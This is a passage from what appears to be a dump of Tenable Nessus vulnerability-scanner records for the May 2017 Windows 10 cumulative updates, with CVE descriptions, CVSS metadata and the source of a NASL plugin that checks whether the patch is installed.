memory. An unauthenticated, remote attacker can exploit this, by convincing a user to visit a specially crafted website or open a specially crafted Microsoft Office document, to execute arbitrary code in the context of the current user. (CVE-2017-0227)\n\n - A remote code execution vulnerability exists in Microsoft browsers in the JavaScript engines due to improper handling of objects in memory. An unauthenticated, remote attacker can exploit this, by convincing a user to visit a specially crafted website or open a specially crafted Microsoft Office document, to execute arbitrary code in the context of the current user. (CVE-2017-0228)\n\n - A remote code execution vulnerability exists in Microsoft browsers in the JavaScript engines due to improper handling of objects in memory. An unauthenticated, remote attacker can exploit this, by convincing a user to visit a specially crafted website or open a specially crafted Microsoft Office document, to execute arbitrary code in the context of the current user. (CVE-2017-0229)\n\n - A spoofing vulnerability exists in Microsoft browsers due to improper rendering of the SmartScreen filter. An unauthenticated, remote attacker can exploit this, via a specially crafted URL, to redirect users to a malicious website that appears to be a legitimate website.\n (CVE-2017-0231)\n\n - An elevation of privilege vulnerability exists in Microsoft Edge due to improper sandboxing. An unauthenticated, remote attacker can exploit this to break out of the Edge AppContainer sandbox and gain elevated privileges. (CVE-2017-0233)\n\n - A remote code execution vulnerability exists in Microsoft Edge in the Chakra JavaScript engine due to improper handling of objects in memory. An unauthenticated, remote attacker can exploit this, by convincing a user to visit a specially crafted website or open a specially crafted Microsoft Office document, to execute arbitrary code in the context of the current user. (CVE-2017-0234)\n\n - A remote code execution vulnerability exists in Microsoft Edge in the Chakra JavaScript engine due to improper handling of objects in memory. An unauthenticated, remote attacker can exploit this, by convincing a user to visit a specially crafted website or open a specially crafted Office document, to execute arbitrary code in the context of the current user. (CVE-2017-0236)\n\n - A remote code execution vulnerability exists in Microsoft browsers in the JavaScript scripting engines due to improper handling of objects in memory. An unauthenticated, remote attacker can exploit this, by convincing a user to visit a specially crafted website or open a specially crafted Office document, to execute arbitrary code in the context of the current user. (CVE-2017-0238)\n\n - A remote code execution vulnerability exists in Microsoft Edge in the scripting engines due to improper handling of objects in memory. An unauthenticated, remote attacker can exploit this, by convincing a user to visit a specially crafted website or to open a specially crafted Office document, to execute arbitrary code in the context of the current user. (CVE-2017-0240)\n\n - An elevation of privilege vulnerability exists in Microsoft Edge due to improper rendering of a domain-less page in the URL. An unauthenticated, remote attacker can exploit this, by convincing a user to visit a specially crafted website, to cause the user to perform actions in the context of the Intranet Zone and access functionality that is not typically available to the browser when browsing in the context of the Internet Zone. (CVE-2017-0241)\n\n - An elevation of privilege vulnerability exists in the win32k component due to improper handling of objects in memory. A local attacker can exploit this, via a specially crafted application, to execute arbitrary code with elevated permissions. Note that an attacker can also cause a denial of service condition on Windows 7 x64 or later systems. (CVE-2017-0246)\n\n - A security bypass vulnerability exists in the Microsoft .NET Framework and .NET Core components due to a failure to completely validate certificates. An attacker can exploit this to present a certificate that is marked invalid for a specific use, but the component uses it for that purpose, resulting in a bypass of the Enhanced Key Usage taggings. (CVE-2017-0248)\n\n - An information disclosure vulnerability exists in the Windows kernel due to improper initialization of objects in memory. A local attacker can exploit this, via a specially crafted application, to disclose sensitive information. (CVE-2017-0258)\n\n - An information disclosure vulnerability exists in the Windows kernel due to improper initialization of objects in memory. A local attacker can exploit this, via a specially crafted application, to disclose sensitive information. (CVE-2017-0259)\n\n - An elevation of privilege vulnerability exists in the Windows kernel-mode driver due to improper handling of objects in memory. A local attacker can exploit this, via a specially crafted application, to run arbitrary code in kernel mode. (CVE-2017-0263)\n\n - A remote code execution vulnerability exists in the Microsoft scripting engines due to improper handling of objects in memory. An unauthenticated, remote attacker can exploit this, by convincing a user to visit a crafted web page or open a crafted Office document file, to execute arbitrary code in the context of the current user. (CVE-2017-0266)\n\n - An information disclosure vulnerability exists in the Microsoft Server Message Block 1.0 (SMBv1) server when handling certain requests. An unauthenticated, remote attacker can exploit this, via a specially crafted packet, to disclose sensitive information.\n (CVE-2017-0267)\n\n - An information disclosure vulnerability exists in the Microsoft Server Message Block 1.0 (SMBv1) server when handling certain requests. An unauthenticated, remote attacker can exploit this, via a specially crafted packet, to disclose sensitive information.\n (CVE-2017-0268)\n\n - A denial of service vulnerability exists in Microsoft Server Message Block (SMB) when handling a specially crafted request to the server. An unauthenticated, remote attacker can exploit this, via a crafted SMB request, to cause the system to stop responding.\n (CVE-2017-0269)\n\n - An information disclosure vulnerability exists in the Microsoft Server Message Block 1.0 (SMBv1) server when handling certain requests. An unauthenticated, remote attacker can exploit this, via a specially crafted packet, to disclose sensitive information.\n (CVE-2017-0270)\n\n - An information disclosure vulnerability exists in the Microsoft Server Message Block 1.0 (SMBv1) server when handling certain requests. An unauthenticated, remote attacker can exploit this, via a specially crafted packet, to disclose sensitive information.\n (CVE-2017-0271)\n\n - A remote code execution vulnerability exists in the Microsoft Server Message Block 1.0 (SMBv1) server when handling certain requests. An unauthenticated, remote attacker can exploit this, via a specially crafted packet, to execute arbitrary code on a target server.\n (CVE-2017-0272)\n\n - A denial of service vulnerability exists in Microsoft Server Message Block (SMB) when handling a specially crafted request to the server. An unauthenticated, remote attacker can exploit this, via a crafted SMB request, to cause the system to stop responding.\n (CVE-2017-0273)\n\n - An information disclosure vulnerability exists in the Microsoft Server Message Block 1.0 (SMBv1) server when handling certain requests. An unauthenticated, remote attacker can exploit this, via a specially crafted packet, to disclose sensitive information.\n (CVE-2017-0274)\n\n - An information disclosure vulnerability exists in the Microsoft Server Message Block 1.0 (SMBv1) server when handling certain requests. An unauthenticated, remote attacker can exploit this, via a specially crafted packet, to disclose sensitive information.\n (CVE-2017-0275)\n\n - An information disclosure vulnerability exists in the Microsoft Server Message Block 1.0 (SMBv1) server when handling certain requests. An unauthenticated, remote attacker can exploit this, via a specially crafted packet, to disclose sensitive information.\n (CVE-2017-0276)\n\n - A remote code execution vulnerability exists in the Microsoft Server Message Block 1.0 (SMBv1) server when handling certain requests. An unauthenticated, remote attacker can exploit this, via a specially crafted packet, to execute arbitrary code on a target server.\n (CVE-2017-0277)\n\n - A remote code execution vulnerability exists in the Microsoft Server Message Block 1.0 (SMBv1) server when handling certain requests. An unauthenticated, remote attacker can exploit this, via a specially crafted packet, to execute arbitrary code on a target server.\n (CVE-2017-0278)\n\n - A remote code execution vulnerability exists in the Microsoft Server Message Block 1.0 (SMBv1) server when handling certain requests. An unauthenticated, remote attacker can exploit this, via a specially crafted packet, to execute arbitrary code on a target server.\n (CVE-2017-0279)\n\n - A denial of service vulnerability exists in Microsoft Server Message Block (SMB) when handling a specially crafted request to the server. An unauthenticated, remote attacker can exploit this, via a crafted SMB request, to cause the system to stop responding.\n (CVE-2017-0280)", "cvss3": {"score": 8.1, "vector": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H"}, "published": "2017-05-09T00:00:00", "type": "nessus", "title": "KB4019473: Windows 10 Version 1511 May 2017 Cumulative Update", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2017-0064", "CVE-2017-0077", "CVE-2017-0190", "CVE-2017-0212", "CVE-2017-0213", "CVE-2017-0214", "CVE-2017-0222", "CVE-2017-0226", "CVE-2017-0227", "CVE-2017-0228", "CVE-2017-0229", "CVE-2017-0231", "CVE-2017-0233", "CVE-2017-0234", "CVE-2017-0236", "CVE-2017-0238", "CVE-2017-0240", "CVE-2017-0241", "CVE-2017-0246", "CVE-2017-0248", "CVE-2017-0258", "CVE-2017-0259", "CVE-2017-0263", "CVE-2017-0266", "CVE-2017-0267", "CVE-2017-0268", "CVE-2017-0269", "CVE-2017-0270", "CVE-2017-0271", "CVE-2017-0272", "CVE-2017-0273", "CVE-2017-0274", "CVE-2017-0275", "CVE-2017-0276", "CVE-2017-0277", "CVE-2017-0278", "CVE-2017-0279", "CVE-2017-0280"], "modified": "2022-03-29T00:00:00", "cpe": ["cpe:/o:microsoft:windows"], "id": "SMB_NT_MS17_MAY_4019473.NASL", "href": "https://www.tenable.com/plugins/nessus/100060", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(100060);\n script_version(\"1.15\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2022/03/29\");\n\n script_cve_id(\n \"CVE-2017-0064\",\n \"CVE-2017-0077\",\n \"CVE-2017-0190\",\n \"CVE-2017-0212\",\n \"CVE-2017-0213\",\n \"CVE-2017-0214\",\n \"CVE-2017-0222\",\n \"CVE-2017-0226\",\n \"CVE-2017-0227\",\n \"CVE-2017-0228\",\n \"CVE-2017-0229\",\n \"CVE-2017-0231\",\n \"CVE-2017-0233\",\n \"CVE-2017-0234\",\n \"CVE-2017-0236\",\n \"CVE-2017-0238\",\n \"CVE-2017-0240\",\n \"CVE-2017-0241\",\n \"CVE-2017-0246\",\n \"CVE-2017-0248\",\n \"CVE-2017-0258\",\n \"CVE-2017-0259\",\n \"CVE-2017-0263\",\n \"CVE-2017-0266\",\n \"CVE-2017-0267\",\n \"CVE-2017-0268\",\n \"CVE-2017-0269\",\n \"CVE-2017-0270\",\n \"CVE-2017-0271\",\n \"CVE-2017-0272\",\n \"CVE-2017-0273\",\n \"CVE-2017-0274\",\n \"CVE-2017-0275\",\n \"CVE-2017-0276\",\n \"CVE-2017-0277\",\n \"CVE-2017-0278\",\n \"CVE-2017-0279\",\n \"CVE-2017-0280\"\n );\n script_bugtraq_id(\n 98099,\n 98102,\n 98103,\n 98108,\n 98112,\n 98113,\n 98114,\n 98117,\n 98121,\n 98127,\n 98139,\n 98164,\n 98173,\n 98179,\n 98203,\n 98208,\n 98217,\n 98229,\n 98234,\n 98237,\n 98258,\n 98259,\n 98260,\n 98261,\n 98263,\n 98264,\n 98265,\n 98266,\n 98267,\n 98268,\n 98270,\n 98271,\n 98272,\n 98273,\n 98274,\n 98276,\n 98281,\n 98298\n );\n script_xref(name:\"MSKB\", value:\"4019473\");\n script_xref(name:\"MSFT\", value:\"MS17-4019473\");\n script_xref(name:\"IAVA\", value:\"2017-A-0148\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2022/08/10\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2022/08/25\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2022/04/18\");\n\n script_name(english:\"KB4019473: Windows 10 Version 1511 May 2017 Cumulative Update\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote Windows host is affected by multiple vulnerabilities.\");\n script_set_attribute(attribute:\"description\", value:\n\"The remote Windows 10 version 1511 host is missing security update\nKB4019473. It is, therefore, affected by multiple vulnerabilities :\n\n - A security bypass vulnerability exists in Internet\n Explorer due to an unspecified flaw. An unauthenticated,\n remote attacker can exploit this, by convincing a user\n to visit a specially crafted website, to bypass mixed\n content warnings and load insecure content (HTTP) from\n secure locations (HTTPS). (CVE-2017-0064)\n\n - An elevation of privilege vulnerability exists in\n Windows in the Microsoft DirectX graphics kernel\n subsystem (dxgkrnl.sys) due to improper handling of\n objects in memory. A local attacker can exploit this,\n via a specially crafted application, to execute\n arbitrary code in an elevated context. (CVE-2017-0077)\n\n - An information disclosure vulnerability exists in the\n Windows Graphics Device Interface (GDI) due to improper\n handling of objects in memory. A local attacker can\n exploit this, via a specially crafted application, to\n disclose sensitive information. (CVE-2017-0190)\n\n - An elevation of privilege vulnerability exists in\n Windows Hyper-V due to improper validation of vSMB\n packet data. An unauthenticated, adjacent attacker can\n exploit this to gain elevated privileges.\n (CVE-2017-0212)\n\n - An elevation of privilege vulnerability exists in the\n Windows COM Aggregate Marshaler due to an unspecified\n flaw. A local attacker can exploit this, via a specially\n crafted application, to execute arbitrary code with\n elevated privileges. (CVE-2017-0213)\n\n - An elevation of privilege vulnerability exists in\n Windows due to improper validation of user-supplied\n input when loading type libraries. A local attacker can\n exploit this, via a specially crafted application, to\n gain elevated privileges. (CVE-2017-0214)\n\n - A remote code execution vulnerability exists in\n Microsoft Internet Explorer due to improper handling of\n objects in memory. An unauthenticated, remote attacker\n can exploit this, by convincing a user to visit a\n specially crafted website, to execute arbitrary code in\n the context of the current user. (CVE-2017-0222)\n\n - A remote code execution vulnerability exists in\n Microsoft Internet Explorer due to improper handling of\n objects in memory. An unauthenticated, remote attacker\n can exploit this, by convincing a user to visit a\n specially crafted website, to execute arbitrary code in\n the context of the current user. (CVE-2017-0226)\n\n - A remote code execution vulnerability exists in\n Microsoft Edge in the scripting engines due to improper\n handling of objects in memory. An unauthenticated,\n remote attacker can exploit this, by convincing a user\n to visit a specially crafted website or open a specially\n crafted Microsoft Office document, to execute arbitrary\n code in the context of the current user. (CVE-2017-0227)\n\n - A remote code execution vulnerability exists in\n Microsoft browsers in the JavaScript engines due to\n improper handling of objects in memory. An\n unauthenticated, remote attacker can exploit this, by\n convincing a user to visit a specially crafted website\n or open a specially crafted Microsoft Office document,\n to execute arbitrary code in the context of the current\n user. (CVE-2017-0228)\n\n - A remote code execution vulnerability exists in\n Microsoft browsers in the JavaScript engines due to\n improper handling of objects in memory. An\n unauthenticated, remote attacker can exploit this, by\n convincing a user to visit a specially crafted website\n or open a specially crafted Microsoft Office document,\n to execute arbitrary code in the context of the current\n user. (CVE-2017-0229)\n\n - A spoofing vulnerability exists in Microsoft browsers\n due to improper rendering of the SmartScreen filter. An\n unauthenticated, remote attacker can exploit this, via a\n specially crafted URL, to redirect users to a malicious\n website that appears to be a legitimate website.\n (CVE-2017-0231)\n\n - An elevation of privilege vulnerability exists in\n Microsoft Edge due to improper sandboxing. An\n unauthenticated, remote attacker can exploit this to\n break out of the Edge AppContainer sandbox and gain\n elevated privileges. (CVE-2017-0233)\n\n - A remote code execution vulnerability exists in\n Microsoft Edge in the Chakra JavaScript engine due to\n improper handling of objects in memory. An\n unauthenticated, remote attacker can exploit this, by\n convincing a user to visit a specially crafted website\n or open a specially crafted Microsoft Office document,\n to execute arbitrary code in the context of the current\n user. (CVE-2017-0234)\n\n - A remote code execution vulnerability exists in\n Microsoft Edge in the Chakra JavaScript engine due to\n improper handling of objects in memory. An\n unauthenticated, remote attacker can exploit this, by\n convincing a user to visit a specially crafted website\n or open a specially crafted Office document, to\n execute arbitrary code in the context of the current\n user. (CVE-2017-0236)\n\n - A remote code execution vulnerability exists in\n Microsoft browsers in the JavaScript scripting engines\n due to improper handling of objects in memory. An\n unauthenticated, remote attacker can exploit this, by\n convincing a user to visit a specially crafted website\n or open a specially crafted Office document, to\n execute arbitrary code in the context of the current\n user. (CVE-2017-0238)\n\n - A remote code execution vulnerability exists in\n Microsoft Edge in the scripting engines due to improper\n handling of objects in memory. An unauthenticated,\n remote attacker can exploit this, by convincing a user\n to visit a specially crafted website or to open a\n specially crafted Office document, to execute arbitrary\n code in the context of the current user. (CVE-2017-0240)\n\n - An elevation of privilege vulnerability exists in\n Microsoft Edge due to improper rendering of a\n domain-less page in the URL. An unauthenticated, remote\n attacker can exploit this, by convincing a user to visit\n a specially crafted website, to cause the user to\n perform actions in the context of the Intranet Zone and\n access functionality that is not typically available to\n the browser when browsing in the context of the Internet\n Zone. (CVE-2017-0241)\n\n - An elevation of privilege vulnerability exists in the\n win32k component due to improper handling of objects in\n memory. A local attacker can exploit this, via a\n specially crafted application, to execute arbitrary code\n with elevated permissions. Note that an attacker can\n also cause a denial of service condition on Windows 7\n x64 or later systems. (CVE-2017-0246)\n\n - A security bypass vulnerability exists in the Microsoft\n .NET Framework and .NET Core components due to a failure\n to completely validate certificates. An attacker can\n exploit this to present a certificate that is marked\n invalid for a specific use, but the component uses it\n for that purpose, resulting in a bypass of the Enhanced\n Key Usage taggings. (CVE-2017-0248)\n\n - An information disclosure vulnerability exists in the\n Windows kernel due to improper initialization of objects\n in memory. A local attacker can exploit this, via a\n specially crafted application, to disclose sensitive\n information. (CVE-2017-0258)\n\n - An information disclosure vulnerability exists in the\n Windows kernel due to improper initialization of objects\n in memory. A local attacker can exploit this, via a\n specially crafted application, to disclose sensitive\n information. (CVE-2017-0259)\n\n - An elevation of privilege vulnerability exists in the\n Windows kernel-mode driver due to improper handling of\n objects in memory. A local attacker can exploit this,\n via a specially crafted application, to run arbitrary\n code in kernel mode. (CVE-2017-0263)\n\n - A remote code execution vulnerability exists in the\n Microsoft scripting engines due to improper handling of\n objects in memory. An unauthenticated, remote attacker\n can exploit this, by convincing a user to visit a\n crafted web page or open a crafted Office document file,\n to execute arbitrary code in the context of the current\n user. (CVE-2017-0266)\n\n - An information disclosure vulnerability exists in the\n Microsoft Server Message Block 1.0 (SMBv1) server when\n handling certain requests. An unauthenticated, remote\n attacker can exploit this, via a specially crafted\n packet, to disclose sensitive information.\n (CVE-2017-0267)\n\n - An information disclosure vulnerability exists in the\n Microsoft Server Message Block 1.0 (SMBv1) server when\n handling certain requests. An unauthenticated, remote\n attacker can exploit this, via a specially crafted\n packet, to disclose sensitive information.\n (CVE-2017-0268)\n\n - A denial of service vulnerability exists in Microsoft\n Server Message Block (SMB) when handling a specially\n crafted request to the server. An unauthenticated,\n remote attacker can exploit this, via a crafted SMB\n request, to cause the system to stop responding.\n (CVE-2017-0269)\n\n - An information disclosure vulnerability exists in the\n Microsoft Server Message Block 1.0 (SMBv1) server when\n handling certain requests. An unauthenticated, remote\n attacker can exploit this, via a specially crafted\n packet, to disclose sensitive information.\n (CVE-2017-0270)\n\n - An information disclosure vulnerability exists in the\n Microsoft Server Message Block 1.0 (SMBv1) server when\n handling certain requests. An unauthenticated, remote\n attacker can exploit this, via a specially crafted\n packet, to disclose sensitive information.\n (CVE-2017-0271)\n\n - A remote code execution vulnerability exists in the\n Microsoft Server Message Block 1.0 (SMBv1) server when\n handling certain requests. An unauthenticated, remote\n attacker can exploit this, via a specially crafted\n packet, to execute arbitrary code on a target server.\n (CVE-2017-0272)\n\n - A denial of service vulnerability exists in Microsoft\n Server Message Block (SMB) when handling a specially\n crafted request to the server. An unauthenticated,\n remote attacker can exploit this, via a crafted SMB\n request, to cause the system to stop responding.\n (CVE-2017-0273)\n\n - An information disclosure vulnerability exists in the\n Microsoft Server Message Block 1.0 (SMBv1) server when\n handling certain requests. An unauthenticated, remote\n attacker can exploit this, via a specially crafted\n packet, to disclose sensitive information.\n (CVE-2017-0274)\n\n - An information disclosure vulnerability exists in the\n Microsoft Server Message Block 1.0 (SMBv1) server when\n handling certain requests. An unauthenticated, remote\n attacker can exploit this, via a specially crafted\n packet, to disclose sensitive information.\n (CVE-2017-0275)\n\n - An information disclosure vulnerability exists in the\n Microsoft Server Message Block 1.0 (SMBv1) server when\n handling certain requests. An unauthenticated, remote\n attacker can exploit this, via a specially crafted\n packet, to disclose sensitive information.\n (CVE-2017-0276)\n\n - A remote code execution vulnerability exists in the\n Microsoft Server Message Block 1.0 (SMBv1) server when\n handling certain requests. An unauthenticated, remote\n attacker can exploit this, via a specially crafted\n packet, to execute arbitrary code on a target server.\n (CVE-2017-0277)\n\n - A remote code execution vulnerability exists in the\n Microsoft Server Message Block 1.0 (SMBv1) server when\n handling certain requests. An unauthenticated, remote\n attacker can exploit this, via a specially crafted\n packet, to execute arbitrary code on a target server.\n (CVE-2017-0278)\n\n - A remote code execution vulnerability exists in the\n Microsoft Server Message Block 1.0 (SMBv1) server when\n handling certain requests. An unauthenticated, remote\n attacker can exploit this, via a specially crafted\n packet, to execute arbitrary code on a target server.\n (CVE-2017-0279)\n\n - A denial of service vulnerability exists in Microsoft\n Server Message Block (SMB) when handling a specially\n crafted request to the server. An unauthenticated,\n remote attacker can exploit this, via a crafted SMB\n request, to cause the system to stop responding.\n (CVE-2017-0280)\");\n # https://support.microsoft.com/en-us/help/4019473/windows-10-update-kb4019473\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?4763dd01\");\n script_set_attribute(attribute:\"solution\", value:\n\"Apply security update KB4019473.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2017-0272\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2017/05/09\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2017/05/09\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2017/05/09\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:microsoft:windows\");\n script_set_attribute(attribute:\"stig_severity\", value:\"I\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Windows : Microsoft Bulletins\");\n\n script_copyright(english:\"This script is Copyright (C) 2017-2022 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"smb_hotfixes.nasl\", \"ms_bulletin_checks_possible.nasl\", \"smb_check_rollup.nasl\");\n script_require_keys(\"SMB/MS_Bulletin_Checks/Possible\");\n script_require_ports(139, 445, \"Host/patch_management_checks\");\n\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"smb_hotfixes_fcheck.inc\");\ninclude(\"smb_hotfixes.inc\");\ninclude(\"smb_func.inc\");\ninclude(\"smb_reg_query.inc\");\ninclude(\"misc_func.inc\");\n\nget_kb_item_or_exit('SMB/MS_Bulletin_Checks/Possible');\n\nbulletin = 'MS17-05';\nkb = make_list(\n '4019473' # 10 1151\n);\n\nif (get_kb_item('Host/patch_management_checks')) hotfix_check_3rd_party(bulletin:bulletin, kbs:kb, severity:SECURITY_HOLE);\n\nget_kb_item_or_exit(\"SMB/Registry/Enumerated\");\nget_kb_item_or_exit('SMB/WindowsVersion', exit_code:1);\n\nif (hotfix_check_sp_range(win10:'0') <= 0) audit(AUDIT_OS_SP_NOT_VULN);\n\nshare = hotfix_get_systemdrive(exit_on_fail:TRUE, as_share:TRUE);\nif (!is_accessible_share(share:share)) audit(AUDIT_SHARE_FAIL, share);\n\nif (\n # 10 (1511)\n smb_check_rollup(os:\"10\",\n sp:0,\n os_build:\"10586\",\n rollup_date: \"05_2017\",\n bulletin:bulletin,\n rollup_kb_list:make_list(4019473))\n)\n{\n replace_kb_item(name:'SMB/Missing/'+bulletin, value:TRUE);\n hotfix_security_hole();\n hotfix_check_fversion_end();\n exit(0);\n}\nelse\n{\n hotfix_check_fversion_end();\n audit(AUDIT_HOST_NOT, hotfix_get_audit_report());\n}\n", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-06-16T16:23:04", "description": "The remote Windows host is missing security update KB4019472. It is, therefore, affected by multiple vulnerabilities :\n\n - A security bypass vulnerability exists in Internet Explorer due to an unspecified flaw. An unauthenticated, remote attacker can exploit this, by convincing a user to visit a specially crafted website, to bypass mixed content warnings and load insecure content (HTTP) from secure locations (HTTPS). (CVE-2017-0064)\n\n - An elevation of privilege vulnerability exists in Windows in the Microsoft DirectX graphics kernel subsystem (dxgkrnl.sys) due to improper handling of objects in memory. A local attacker can exploit this, via a specially crafted application, to execute arbitrary code in an elevated context. (CVE-2017-0077)\n\n - A denial of service vulnerability exists in the Windows DNS server when it's configured to answer version queries. An unauthenticated, remote attacker can exploit this, via a malicious DNS query, to cause the DNS server to become nonresponsive. (CVE-2017-0171)\n\n - An information disclosure vulnerability exists in the Windows Graphics Device Interface (GDI) due to improper handling of objects in memory. A local attacker can exploit this, via a specially crafted application, to disclose sensitive information. (CVE-2017-0190)\n\n - An elevation of privilege vulnerability exists in Windows Hyper-V due to improper validation of vSMB packet data. An unauthenticated, adjacent attacker can exploit this to gain elevated privileges.\n (CVE-2017-0212)\n\n - An elevation of privilege vulnerability exists in the Windows COM Aggregate Marshaler due to an unspecified flaw. A local attacker can exploit this, via a specially crafted application, to execute arbitrary code with elevated privileges. (CVE-2017-0213)\n\n - An elevation of privilege vulnerability exists in Windows due to improper validation of user-supplied input when loading type libraries. A local attacker can exploit this, via a specially crafted application, to gain elevated privileges. (CVE-2017-0214)\n\n - A remote code execution vulnerability exists in Microsoft Edge due to improper handling of objects in memory. An unauthenticated, remote attacker can exploit this, by convincing a user to visit a specially crafted website, to execute arbitrary code in the context of the current user. (CVE-2017-0221)\n\n - A remote code execution vulnerability exists in Microsoft Internet Explorer due to improper handling of objects in memory. An unauthenticated, remote attacker can exploit this, by convincing a user to visit a specially crafted website, to execute arbitrary code in the context of the current user. (CVE-2017-0222)\n\n - A remote code execution vulnerability exists in Microsoft Internet Explorer due to improper handling of objects in memory. An unauthenticated, remote attacker can exploit this, by convincing a user to visit a specially crafted website, to execute arbitrary code in the context of the current user. (CVE-2017-0226)\n\n - A remote code execution vulnerability exists in Microsoft Edge in the scripting engines due to improper handling of objects in memory. An unauthenticated, remote attacker can exploit this, by convincing a user to visit a specially crafted website or open a specially crafted Microsoft Office document, to execute arbitrary code in the context of the current user. (CVE-2017-0227)\n\n - A remote code execution vulnerability exists in Microsoft browsers in the JavaScript engines due to improper handling of objects in memory. An unauthenticated, remote attacker can exploit this, by convincing a user to visit a specially crafted website or open a specially crafted Microsoft Office document, to execute arbitrary code in the context of the current user. (CVE-2017-0228)\n\n - A remote code execution vulnerability exists in Microsoft browsers in the JavaScript engines due to improper handling of objects in memory. An unauthenticated, remote attacker can exploit this, by convincing a user to visit a specially crafted website or open a specially crafted Microsoft Office document, to execute arbitrary code in the context of the current user. (CVE-2017-0229)\n\n - A remote code execution vulnerability exists in Microsoft browsers in the JavaScript engines due to improper handling of objects in memory. An unauthenticated, remote attacker can exploit this, by convincing a user to visit a specially crafted website or open a specially crafted Office document, to execute arbitrary code in the context of the current user.\n (CVE-2017-0230)\n\n - A spoofing vulnerability exists in Microsoft browsers due to improper rendering of the SmartScreen filter. An unauthenticated, remote attacker can exploit this, via a specially crafted URL, to redirect users to a malicious website that appears to be a legitimate website.\n (CVE-2017-0231)\n\n - An elevation of privilege vulnerability exists in Microsoft Edge due to improper sandboxing. An unauthenticated, remote attacker can exploit this to break out of the Edge AppContainer sandbox and gain elevated privileges. (CVE-2017-0233)\n\n - A remote code execution vulnerability exists in Microsoft Edge in the Chakra JavaScript engine due to improper handling of objects in memory. An unauthenticated, remote attacker can exploit this, by convincing a user to visit a specially crafted website or open a specially crafted Microsoft Office document, to execute arbitrary code in the context of the current user. (CVE-2017-0234)\n\n - A remote code execution vulnerability exists in Microsoft Edge in the Chakra JavaScript engine due to improper handling of objects in memory. An unauthenticated, remote attacker can exploit this, by convincing a user to visit a specially crafted website or open a specially crafted Office document, to execute arbitrary code in the context of the current user. (CVE-2017-0236)\n\n - A remote code execution vulnerability exists in Microsoft browsers in the JavaScript scripting engines due to improper handling of objects in memory. An unauthenticated, remote attacker can exploit this, by convincing a user to visit a specially crafted website or open a specially crafted Office document, to execute arbitrary code in the context of the current user. (CVE-2017-0238)\n\n - A remote code execution vulnerability exists in Microsoft Edge in the scripting engines due to improper handling of objects in memory. An unauthenticated, remote attacker can exploit this, by convincing a user to visit a specially crafted website or to open a specially crafted Office document, to execute arbitrary code in the context of the current user. (CVE-2017-0240)\n\n - An elevation of privilege vulnerability exists in Microsoft Edge due to improper rendering of a domain-less page in the URL. An unauthenticated, remote attacker can exploit this, by convincing a user to visit a specially crafted website, to cause the user to perform actions in the context of the Intranet Zone and access functionality that is not typically available to the browser when browsing in the context of the Internet Zone. (CVE-2017-0241)\n\n - An elevation of privilege vulnerability exists in the win32k component due to improper handling of objects in memory. A local attacker can exploit this, via a specially crafted application, to execute arbitrary code with elevated permissions. Note that an attacker can also cause a denial of service condition on Windows 7 x64 or later systems. (CVE-2017-0246)\n\n - A security bypass vulnerability exists in the Microsoft .NET Framework and .NET Core components due to a failure to completely validate certificates. An attacker can exploit this to present a certificate that is marked invalid for a specific use, but the component uses it for that purpose, resulting in a bypass of the Enhanced Key Usage taggings. (CVE-2017-0248)\n\n - An information disclosure vulnerability exists in the Windows kernel due to improper initialization of objects in memory. A local attacker can exploit this, via a specially crafted application, to disclose sensitive information. (CVE-2017-0258)\n\n - An information disclosure vulnerability exists in the Windows kernel due to improper initialization of objects in memory. A local attacker can exploit this, via a specially crafted application, to disclose sensitive information. (CVE-2017-0259)\n\n - An elevation of privilege vulnerability exists in the Windows kernel-mode driver due to improper handling of objects in memory. A local attacker can exploit this, via a specially crafted application, to run arbitrary code in kernel mode. (CVE-2017-0263)\n\n - A remote code execution vulnerability exists in the Microsoft scripting engines due to improper handling of objects in memory. An unauthenticated, remote attacker can exploit this, by convincing a user to visit a crafted web page or open a crafted Office document file, to execute arbitrary code in the context of the current user. (CVE-2017-0266)\n\n - An information disclosure vulnerability exists in the Microsoft Server Message Block 1.0 (SMBv1) server when handling certain requests. An unauthenticated, remote attacker can exploit this, via a specially crafted packet, to disclose sensitive information.\n (CVE-2017-0267)\n\n - An information disclosure vulnerability exists in the Microsoft Server Message Block 1.0 (SMBv1) server when handling certain requests. An unauthenticated, remote attacker can exploit this, via a specially crafted packet, to disclose sensitive information.\n (CVE-2017-0268)\n\n - A denial of service vulnerability exists in Microsoft Server Message Block (SMB) when handling a specially crafted request to the server. An unauthenticated, remote attacker can exploit this, via a crafted SMB request, to cause the system to stop responding.\n (CVE-2017-0269)\n\n - An information disclosure vulnerability exists in the Microsoft Server Message Block 1.0 (SMBv1) server when handling certain requests. An unauthenticated, remote attacker can exploit this, via a specially crafted packet, to 